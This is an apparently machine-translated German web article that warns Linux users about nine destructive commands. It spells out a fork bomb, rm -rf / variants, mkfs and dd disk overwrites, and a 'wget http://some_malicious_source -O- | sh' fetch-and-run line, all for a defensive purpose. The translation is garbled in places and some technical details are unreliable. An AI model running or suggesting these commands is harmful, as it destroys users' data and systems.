de.hideout-lastation.com
Paradies Für Designer Und Entwickler


9 Linux Commands & Codes, denen Sie sich aussetzen sollten

Linux-Shell / Terminal-Befehle sind sehr mächtig und nur ein einfacher Befehl kann dazu führen, dass ein Ordner, Dateien oder Stammordner gelöscht wird usw.

In einigen Fällen wird Linux Sie nicht einmal zur Bestätigung auffordern, sondern es wird den Befehl sofort ausführen, wodurch Sie wertvolle Daten und Informationen verlieren, die in diesen Dateien und Ordnern gespeichert sind.

Es ist üblich, dass Leute Inhalte im Internet posten, die neuen Linux-Benutzern empfehlen, diese Befehle auszuführen . Dies mag für jemanden, der den Inhalt gepostet hat, wie ein Scherz erscheinen, aber es ist keine Lacherei für die Person am anderen Ende.

Wir haben einige Linux-Befehle zusammengestellt, die für Ihr System sehr schädlich sind, damit Sie sie vermeiden können. Bedenke, dass sie in der Tat gefährlich sind und sogar auf verschiedene Arten verändert werden können, um neue Befehle zu erzeugen, die mehr Schaden zufügen.

Es ist wichtig zu beachten, dass einige dieser Befehle nur gefährlich sind, wenn ihnen auf Ubuntu Sudo vorangestellt ist . Während auf anderen Linux-Distributionen die meisten dieser gegebenen Befehle gefährlich sind, können sie als root ausgeführt werden.

Werfen Sie einen Blick auf die 9 Befehle und Codes, die Sie nicht ausführen sollten.

1. Linux Fork Bomb Befehl

:(){ :|: & };: auch bekannt als Fork Bomb ist eine Denial-of-Service-Attacke gegen ein Linux-System. :(){ :|: & };: ist eine Bash-Funktion. Sobald es ausgeführt wird, wiederholt es sich mehrmals, bis das System einfriert .

Sie können es nur loswerden, indem Sie Ihr System neu starten. Seien Sie also vorsichtig, wenn Sie diesen Befehl in Ihrer Linux-Shell ausführen.

2. mv Ordner / dev / null Befehl

mv folder/dev/null ist ein weiterer gefährlicher Befehl. Dev/null oder null device ist eine Gerätedatei, die alle darauf geschriebenen Daten verwirft, aber meldet, dass der Schreibvorgang erfolgreich ausgeführt wurde . Es ist auch bekannt als bit bucked oder schwarzes Loch .

3. Befehl rm -rf

rm -rf Befehl ist eine schnelle Möglichkeit, einen Ordner und seinen Inhalt im Linux-Betriebssystem zu löschen . Wenn Sie nicht wissen, wie man es richtig benutzt, kann es sehr gefährlich für das System werden. Die häufigsten Kombinationen und Optionen, die mit dem Befehl rm-rf verwendet werden, sind nachfolgend aufgeführt:

  • rm Befehl rm wird zum Löschen der Dateien im Linux-System verwendet.
  • rm -f Befehl rm -f schreibgeschützte Dateien im Ordner ohne Eingabeaufforderung entfernt.
  • rm -r Befehl rm -r löscht den Inhalt eines Ordners rekursiv.
  • rm -d Befehl wird verwendet, um ein leeres Verzeichnis zu entfernen, aber es wird sich weigern, das Verzeichnis zu entfernen, wenn es nicht leer ist.
  • rm -rf/ command wird für das erzwungene Löschen (es löscht es selbst wenn es schreibgeschützt ist) des gesamten Inhalts im Stammverzeichnis und den Unterordnern verwendet.
  • rm -rf* Befehl rm -rf* wird zum erzwungenen Löschen des gesamten Inhalts im aktuellen Verzeichnis (Verzeichnis, in dem Sie gerade arbeiten) und Unterordnern verwendet.
  • rm -rf. Der Befehl wird zum erzwungenen Löschen des gesamten Inhalts im aktuellen Ordner und in den Unterordnern verwendet. Der Befehl rm -r.[^.]* Kann ebenfalls verwendet werden.
  • rm -i Befehl rm -i wird zum Entfernen von Dateien und Ordnern verwendet. Vor dem Entfernen wird jedoch eine Eingabeaufforderung angezeigt.

4. Befehl mkfs

mkfs kann ein gefährlicher Befehl für Ihr Linux-basiertes System sein, wenn Sie seinen Zweck nicht kennen. Alles, was nach dem mkfs geschrieben wird, wird formatiert und durch ein leeres Linux-Dateisystem ersetzt .

Alle unten genannten Befehle formatieren die Festplatte und erfordern Administratorrechte:

  • mkfs
  • mkfs.ext3
  • mkfs.bfs
  • mkfs.ext2
  • mkfs.minix
  • mkfs.msdos
  • mkfs.reiserfs
  • mkfs.vfat

Der Befehl mkfs.cramfs wird dasselbe tun wie oben, benötigt jedoch keine Administratorrechte.

5. Tar Bombe

Der Befehl tar wird verwendet, um mehrere Dateien in einer einzelnen Datei (archivierte Datei) im .tar- Format zu kombinieren. Eine Tape-Archiv (Tar) -Bombe kann mit diesem Befehl erstellt werden.

Es ist eine Archivdatei, die in Tausende oder Millionen von Dateien mit Namen, die den vorhandenen Dateien ähneln, in das aktuelle Verzeichnis und nicht in ein neues Verzeichnis explodiert, wenn sie entpackt werden.

Sie können vermeiden, Opfer einer Bombe zu werden, indem Sie regelmäßig ein neues Schutzverzeichnis erstellen, wenn Sie eine TAR-Datei erhalten, und dann die empfangene TAR-Datei vor dem Entpacken in dieses Verzeichnis verschieben.

Wenn die TAR-Datei tatsächlich eine Tar-Bombe ist, können Sie einfach das neu erstellte Verzeichnis entfernen, um es loszuwerden. Eine andere Möglichkeit, die Explosion einer Teerbombe zu vermeiden, besteht darin, über die Option -t den gesamten Inhalt einer tar-Datei aufzulisten, um eine Vorstellung von dem Inhaltstyp zu erhalten, der in der tar-Datei enthalten ist.

6. dd Befehl

Der Befehl dd wird zum Kopieren und Konvertieren von Festplattenpartitionen verwendet . Es kann sich jedoch als schädlich erweisen, wenn Sie das falsche Ziel angeben.

Der Befehl kann einer von diesen sein:

  • dd if=/dev/hda of=/dev/hdb
  • dd if=/dev/hda of=/dev/sdb
  • dd if=something of=/dev/hda
  • dd if=something of=/dev/sda

Der folgende Befehl löscht die gesamte primäre Festplatte: dd if=/dev/zero of=/dev/had

7. Shell-Skriptcode

Jemand kann Sie zu Opfern machen, indem er Ihnen den Link zu einem Shell-Skript gibt und Sie zum Herunterladen und Ausführen ermuntert . Das Skript enthält möglicherweise bösartigen oder gefährlichen Code. Das Format des Befehls kann wie wget http://some_malicious_source -O- | sh aussehen: wget http://some_malicious_source -O- | sh wget http://some_malicious_source -O- | sh . Das wget lädt das Skript herunter, während der sh die Skriptausführung herunterlädt.

8. Bösartiger Quellcode

Jemand gibt Ihnen den Quellcode und bittet Sie, ihn zu kompilieren. Der Code scheint ein normaler Code zu sein, aber tatsächlich ist ein Teil des bösartigen Codes im großen Quellcode getarnt und kann Ihrem System Schaden zufügen. Um zu verhindern, dass diese Art von Angriffen Opfer wird, akzeptieren und kompilieren Sie Ihren Quellcode nur aus vertrauenswürdigen Quellen .

9. Dekompressionsbombe

Sie haben eine komprimierte Datei erhalten, und Sie werden aufgefordert, diese Datei zu extrahieren, die sehr klein aussieht, aber einige KB groß sein kann. Tatsächlich enthält diese kleine komprimierte Datei sehr stark komprimierte Daten .

Sobald die Datei dekomprimiert ist, werden Hunderte von GB Daten extrahiert, die Ihre Festplatte füllen können, um die Leistung Ihres Systems zu verringern. Um dies zu vermeiden, denken Sie immer daran, Daten aus vertrauenswürdigen Quellen zu akzeptieren.

Wie Facebook Ihre Daten verwendet und was Sie wissen sollten

Wie Facebook Ihre Daten verwendet und was Sie wissen sollten

Lump Facebook und Privatsphäre zusammen im selben Satz und Sie haben Anlass zu einer mächtigen hitzigen Diskussion. Es ist kein Geheimnis, dass Facebook gewisse Freiheiten mit seinen Nutzungsbedingungen und den Daten, die seine Nutzer auf der Website platzieren, einhält. Es ist für sie kein Problem, Experimente mit ihren Benutzern durchzuführen, nur um zu sehen, wie die Benutzer auf die Manipulation ihres Newsfeeds reagieren würden. Stel

(Tech- und Design-Tipps)

Vier UX-Designtechniken zur Förderung der Benutzerinteraktion

Vier UX-Designtechniken zur Förderung der Benutzerinteraktion

Die Ermutigung von Nutzern, auf einer Website zu bleiben und diese zu nutzen, beinhaltet nicht immer schlankeren Code oder schönere Grafiken. Einige der einfachsten Layouts, wie Reddit, sorgen dafür, dass die Benutzer mit dem Inhalt vertraut sind, und sind begeistert von der Interaktion mit der Site.D

(Tech- und Design-Tipps)